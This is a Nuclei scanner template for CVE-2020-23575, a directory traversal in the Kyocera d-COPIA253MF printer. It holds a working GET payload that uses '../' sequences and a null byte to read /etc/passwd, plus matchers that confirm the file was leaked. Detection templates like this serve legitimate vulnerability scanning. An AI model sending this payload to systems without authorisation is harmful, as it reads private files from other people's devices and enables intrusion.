nuclei-templates/cves/2020/CVE-2020-23575.yaml

38 lines
1.0 KiB
YAML

id: CVE-2020-23575
info:
name: Kyocera Printer d-COPIA253MF - Directory Traversal
author: 0x_Akoko
severity: high
description: Kyocera Printer d-COPIA253MF plus is susceptible to a directory traversal vulnerability which could allow an attacker to retrieve or view arbitrary files from the affected server.
reference:
- https://www.exploit-db.com/exploits/48561
- https://nvd.nist.gov/vuln/detail/CVE-2020-23575
- https://www.kyoceradocumentsolutions.com.tr/tr.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-23575
cwe-id: CWE-22
tags: cve,cve2020,printer,iot,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "root:.*:0:0:"
- "bin:.*:1:1"
condition: or
- type: status
status:
- 200
# Enhanced by mp on 2022/05/04